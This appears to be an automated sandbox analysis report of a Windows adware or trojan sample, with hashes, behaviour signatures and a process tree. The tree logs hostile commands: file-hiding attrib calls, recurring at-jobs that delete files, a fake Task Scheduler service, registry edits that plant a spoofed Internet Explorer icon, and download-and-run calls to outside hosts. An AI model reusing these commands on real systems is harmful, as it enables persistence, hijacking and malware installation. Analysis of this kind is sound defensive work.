Analysis
-
max time kernel
145s -
max time network
141s -
platform
windows7_x64 -
resource
win7-20231215-en -
resource tags
-
submitted
05/01/2024, 07:38
General
-
Target
4320966d6210a0f1862e7899074883f4.exe
-
Size
444KB
-
MD5
4320966d6210a0f1862e7899074883f4
-
SHA1
768191b41c1c0556b3df6fa12e3cedb16002702e
-
SHA256
52f10fc5b995b9c7a36b8cf54e6ba0612fd9e1315792014764d97184c0488a1d
-
SHA512
894528a37741ba6a426af1aa1fedd6e289b81c33a1a64521c2fb1ebd6c5181dafe4b3f8fb663da55a89b1e63f1a5f0bcc9e17cbb06488fb34726cfe14da032ff
-
SSDEEP
12288:wutrzh9xOXk7GOHOJxl/0z+uoqzBTQGteH:wutr5OUSfD/0zpJK
Malware Config
Signatures
-
Creates new service(s) 1 TTPs
-
Sets file to hidden 1 TTPs 6 IoCs
Modifies file attributes to stop it showing in Explorer etc.
-
Executes dropped EXE 3 IoCs
-
Loads dropped DLL 14 IoCs
-
Drops file in Program Files directory 21 IoCs
-
Drops file in Windows directory 4 IoCs
-
Launches sc.exe 2 IoCs
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies Internet Explorer settings 1 TTPs 34 IoCs
-
Modifies registry class 44 IoCs
-
Runs net.exe
-
Suspicious use of FindShellTrayWindow 1 IoCs
-
Suspicious use of SetWindowsHookEx 6 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Views/modifies file attributes 1 TTPs 6 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\4320966d6210a0f1862e7899074883f4.exe"C:\Users\Admin\AppData\Local\Temp\4320966d6210a0f1862e7899074883f4.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install_ha.vbs"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C start /min iexplore http://dao666.com/index2.html?cn3⤵
- Suspicious use of WriteProcessMemory
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" http://dao666.com/index2.html?cn4⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2572 CREDAT:275457 /prefetch:25⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C .\runonce.cmd3⤵
-
C:\Windows\SysWOW64\at.exeat 8:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"4⤵
-
-
C:\Windows\SysWOW64\at.exeat 8:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"4⤵
-
-
C:\Windows\SysWOW64\at.exeat 8:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"4⤵
-
-
C:\Windows\SysWOW64\at.exeat 9:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"4⤵
-
-
C:\Windows\SysWOW64\at.exeat 9:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"4⤵
-
-
C:\Windows\SysWOW64\at.exeat 9:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"4⤵
-
-
C:\Windows\SysWOW64\at.exeat 10:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"4⤵
-
-
C:\Windows\SysWOW64\at.exeat 10:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"4⤵
-
-
C:\Windows\SysWOW64\at.exeat 10:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"4⤵
-
-
C:\Windows\SysWOW64\at.exeat 11:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"4⤵
-
-
C:\Windows\SysWOW64\at.exeat 11:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"4⤵
-
-
C:\Windows\SysWOW64\at.exeat 11:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"4⤵
-
-
C:\Windows\SysWOW64\at.exeat 12:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"4⤵
-
-
C:\Windows\SysWOW64\at.exeat 12:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"4⤵
-
-
C:\Windows\SysWOW64\at.exeat 12:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"4⤵
-
-
C:\Windows\SysWOW64\at.exeat 13:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"4⤵
-
-
C:\Windows\SysWOW64\at.exeat 13:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"4⤵
-
-
C:\Windows\SysWOW64\at.exeat 13:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"4⤵
-
-
C:\Windows\SysWOW64\at.exeat 14:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"4⤵
- Modifies registry class
-
-
C:\Windows\SysWOW64\at.exeat 14:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"4⤵
-
-
C:\Windows\SysWOW64\at.exeat 14:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"4⤵
- Modifies registry class
-
-
C:\Windows\SysWOW64\at.exeat 15:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"4⤵
-
-
C:\Windows\SysWOW64\at.exeat 15:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"4⤵
-
-
C:\Windows\SysWOW64\at.exeat 15:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"4⤵
-
-
C:\Windows\SysWOW64\at.exeat 16:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"4⤵
-
-
C:\Windows\SysWOW64\at.exeat 16:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"4⤵
-
-
C:\Windows\SysWOW64\at.exeat 16:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"4⤵
-
-
C:\Windows\SysWOW64\at.exeat 17:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"4⤵
-
-
C:\Windows\SysWOW64\at.exeat 17:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"4⤵
-
-
C:\Windows\SysWOW64\at.exeat 17:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"4⤵
-
-
C:\Windows\SysWOW64\at.exeat 18:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"4⤵
-
-
C:\Windows\SysWOW64\at.exeat 18:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"4⤵
-
-
C:\Windows\SysWOW64\at.exeat 18:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"4⤵
-
-
C:\Windows\SysWOW64\at.exeat 19:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"4⤵
-
-
C:\Windows\SysWOW64\at.exeat 19:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"4⤵
-
-
C:\Windows\SysWOW64\at.exeat 19:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"4⤵
-
-
C:\Windows\SysWOW64\at.exeat 20:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"4⤵
-
-
C:\Windows\SysWOW64\at.exeat 20:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"4⤵
-
-
C:\Windows\SysWOW64\at.exeat 20:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"4⤵
-
-
C:\Windows\SysWOW64\at.exeat 21:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"4⤵
-
-
C:\Windows\SysWOW64\at.exeat 21:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"4⤵
-
-
C:\Windows\SysWOW64\at.exeat 21:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"4⤵
-
-
C:\Windows\SysWOW64\at.exeat 22:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"4⤵
-
-
C:\Windows\SysWOW64\at.exeat 22:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"4⤵
-
-
C:\Windows\SysWOW64\at.exeat 22:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"4⤵
-
-
C:\Windows\SysWOW64\at.exeat 23:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"4⤵
-
-
C:\Windows\SysWOW64\at.exeat 23:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"4⤵
-
-
C:\Windows\SysWOW64\at.exeat 23:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"4⤵
-
-
C:\Windows\SysWOW64\at.exeat 00:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explore*.*"4⤵
-
-
C:\Windows\SysWOW64\at.exeat 00:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explore*.*"4⤵
-
-
C:\Windows\SysWOW64\at.exeat 00:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"4⤵
-
-
C:\Windows\SysWOW64\at.exeat 10:33 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Σ»└└*.*"4⤵
-
-
C:\Windows\SysWOW64\at.exeat 10:34 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Σ»└└*.*"4⤵
-
-
C:\Windows\SysWOW64\at.exeat 10:35 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday C:\WINDOWS\mail\UltraEdit\is.cmd4⤵
-
-
C:\Windows\SysWOW64\at.exeat 10:36 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Documents and Settings\All Users\╫└├µ\*Σ»└└*.*"4⤵
-
-
C:\Windows\SysWOW64\at.exeat 14:33 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Σ»└└*.*"4⤵
-
-
C:\Windows\SysWOW64\at.exeat 14:34 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Σ»*.*"4⤵
-
-
C:\Windows\SysWOW64\at.exeat 14:35 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday C:\WINDOWS\mail\UltraEdit\is.cmd4⤵
-
-
C:\Windows\SysWOW64\at.exeat 14:36 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Documents and Settings\All Users\╫└├µ\*Σ»└└*.*"4⤵
-
-
C:\Windows\SysWOW64\at.exeat 19:33 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Σ»└└*.*"4⤵
-
-
C:\Windows\SysWOW64\at.exeat 19:34 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Σ»*.*"4⤵
-
-
C:\Windows\SysWOW64\at.exeat 19:35 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday C:\WINDOWS\mail\UltraEdit\is.cmd4⤵
-
-
C:\Windows\SysWOW64\at.exeat 19:36 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Documents and Settings\All Users\╫└├µ\*Σ»└└*.*"4⤵
-
-
C:\Windows\SysWOW64\at.exeat 21:33 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Σ»*.*"4⤵
-
-
C:\Windows\SysWOW64\at.exeat 21:34 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Σ»*.*"4⤵
-
-
C:\Windows\SysWOW64\at.exeat 21:35 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday C:\WINDOWS\mail\UltraEdit\is.cmd4⤵
-
-
C:\Windows\SysWOW64\at.exeat 21:36 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Documents and Settings\All Users\╫└├µ\*Σ»*.*"4⤵
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C .\tool.cmd3⤵
- Suspicious use of WriteProcessMemory
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C .\copy.cmd3⤵
- Drops file in Program Files directory
- Drops file in Windows directory
-
C:\Windows\SysWOW64\attrib.exeattrib +r +h +s "C:\Program Files\WinWare\361.cmd"4⤵
- Sets file to hidden
- Drops file in Program Files directory
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\attrib.exeattrib +r +h +s "C:\Program Files\WinWare\fav\fav.cmd"4⤵
- Sets file to hidden
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\attrib.exeattrib +r +h +s "C:\Program Files\WinWare\tool.cmd"4⤵
- Sets file to hidden
- Drops file in Program Files directory
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\attrib.exeattrib +r +h +s "C:\Program Files\Windows\360SE.vbs"4⤵
- Sets file to hidden
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\attrib.exeattrib +r +h +s "C:\Program Files\Windows\36OSE.vbs"4⤵
- Sets file to hidden
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\attrib.exeattrib +r +h +s "C:\Program Files\WinWare\360.cmd"4⤵
- Sets file to hidden
- Drops file in Program Files directory
- Views/modifies file attributes
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C .\360.cmd3⤵
- Drops file in Program Files directory
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C .\cpa.cmd3⤵
- Loads dropped DLL
-
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"1⤵
- Modifies registry class
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}" /v "InfoTip" /t REG_SZ /d "▓Θ╒╥▓ó╧╘╩╛ Internet ╔╧╡─╨┼╧ó║══°╒╛" /f1⤵
- Modifies registry class
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\DefaultIcon"1⤵
- Modifies registry class
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\InProcServer32"1⤵
- Modifies registry class
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\InProcServer32" /ve /t REG_SZ /d "%systemRoot%\system32\shdocvw.dll" /f1⤵
- Modifies registry class
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell" /ve /t REG_SZ /d "┤≥┐¬╓≈╥│(&H)" /f1⤵
- Modifies registry class
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\┤≥┐¬╓≈╥│(&H)"1⤵
- Modifies registry class
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\┤≥┐¬╓≈╥│(&H)" /v "MUIVerb" /t REG_SZ /d "@shdoclc.dll,-10241" /f1⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\┤≥┐¬╓≈╥│(&H)\Command" /ve /t REG_SZ /d "C:\progra~1\Intern~1\iexplore.exe http://www.dao666.com/?in" /f1⤵
- Modifies registry class
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\╩⌠╨╘(&R)"1⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\╩⌠╨╘(&R)\Command"1⤵
- Modifies registry class
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder" /v "HideOnDesktopPerUser" /t REG_SZ /d "" /f1⤵
- Modifies registry class
-
C:\Windows\SysWOW64\sc.exesc create Schedule binpath= "C:\Windows\svchost.exe -k netsvcs" depend= rpcss start= auto displayname= "Task Scheduler"1⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc config Schedule start= auto1⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\net.exenet start "Task Scheduler"1⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start "Task Scheduler"2⤵
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoInternetIcon" /t REG_DWORD /d 1 /f1⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder" /v "WantsParsDisplayName" /t REG_SZ /d "" /f1⤵
- Modifies registry class
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder" /v "HideFolderVerbs" /t REG_SZ /d "" /f1⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder" /v "Attributes" /t REG_DWORD /d 0 /f1⤵
- Modifies registry class
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder"1⤵
- Modifies registry class
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\╩⌠╨╘(&R)\Command" /ve /t REG_SZ /d "C:\progra~1\Intern~1\iexplore.exe http://www.dao666.com/?in" /f1⤵
- Modifies registry class
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\┤≥┐¬╓≈╥│(&H)\Command"1⤵
- Modifies registry class
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell"1⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\InProcServer32" /v "ThreadingModel" /t REG_SZ /d "Apartment" /f1⤵
- Modifies registry class
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\DefaultIcon" /ve /t REG_EXPAND_SZ /d "shdoclc.dll,0" /f1⤵
- Modifies registry class
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}" /v "LocalizedString" /t REG_SZ /d "Internet Exploror" /f1⤵
- Modifies registry class
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "857679552-69262892910576163891714254154-81671315-543282157-2088048597-1249925828"1⤵
- Modifies registry class
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\msn.exe".\msn.exe"1⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies registry class
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\Gaicia.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\Gaicia.exe" "http://download.youbak.com/msn/software/partner/36a.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\Gaicia.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\Gaicia.exe" "http://down.kuwo.cn/mbox/kwmusic_msnassistant.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
215B
MD589ec051ab621ccd6ab684bb0f17a25ce
SHA11ef2b94c285bfb602892a6e42b1f4b5ba645315f
SHA2560dcd0d2e9c602f4603d9f914a8e4764a6cd6c9c4e986d110b93d846c524110b3
SHA5122ce9c5a5497d68ca5357d6b7ef0239a0bdc8706428e99fe88b2dd3026fb7c734484d77cee088a625bdcadb7eb8e293d728a7525b28614859640806cabb24b001
-
Filesize
193B
MD5327cff8c30e74afc5af67a19d82774e5
SHA113e1be20402e16f7dbf0d86c00f626070f8c9d16
SHA256bc3ca0ade216627a479f9e92eb08efb88b38384fb2cb75f14757600d9b27f6d9
SHA5120e7295ea48de989929313ceb0ac06afa490a188c756a5d71835fb04283f968c82bfeec72ea68e6fb2d957e4ab9d5bb49e95ee8ca9d5ad3c04d1abfbe0e18c6da
-
Filesize
344B
MD552d174e4b9697766f1ab6fdc44f16147
SHA1654aa8d4829fb4251fe20e398850b624d93f3706
SHA256ff58328b2c67740d6c9a7c3506c9d07e255291baf54c518cb4cbc0ac38ea3b91
